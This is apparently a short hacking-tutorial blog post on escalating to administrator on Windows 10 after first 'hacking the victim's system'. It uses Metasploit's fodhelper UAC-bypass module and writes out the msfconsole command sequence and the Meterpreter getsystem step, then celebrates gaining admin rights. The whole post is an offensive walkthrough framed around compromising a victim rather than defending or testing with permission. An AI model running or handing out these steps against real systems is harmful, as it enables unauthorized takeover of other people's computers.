Hello friends! Today we are going
to share new article related to how to bypass window 10 UAC once you have
hacked the victim’s system. In metasploit a new module has been added to
achieve admin access in window 10s.
Attacker: kali Linux
Target: window 10
This module will bypass Windows 10 UAC by hijacking a
special key in the Registry under the current user hive, and inserting a custom
command that will get invoked when the Windows fodhelper.exe application is
launched. It will spawn a second shell that has the UAC flag turned off. This
module modifies a registry key, but cleans up the key once the payload has been
invoked. The module does not require the architecture of the payload to match
the OS. If specifying EXE::Custom your DLL should call ExitProcess() after
starting your payload in a separate process.
Use exploit/windows/local/bypassuac_fodhelper
msf exploit(bypassuac_fodhelper) >set session 1
msf exploit(bypassuac_fodhelper) >exploit
Hence you can see another
meterpreter session 2 opened which
means we successfully exploited the target once again now let’s check user
privilege.
Meterpreter > get system
Awesome!!!! We got admin privilege successfully.
0 comments:
Post a Comment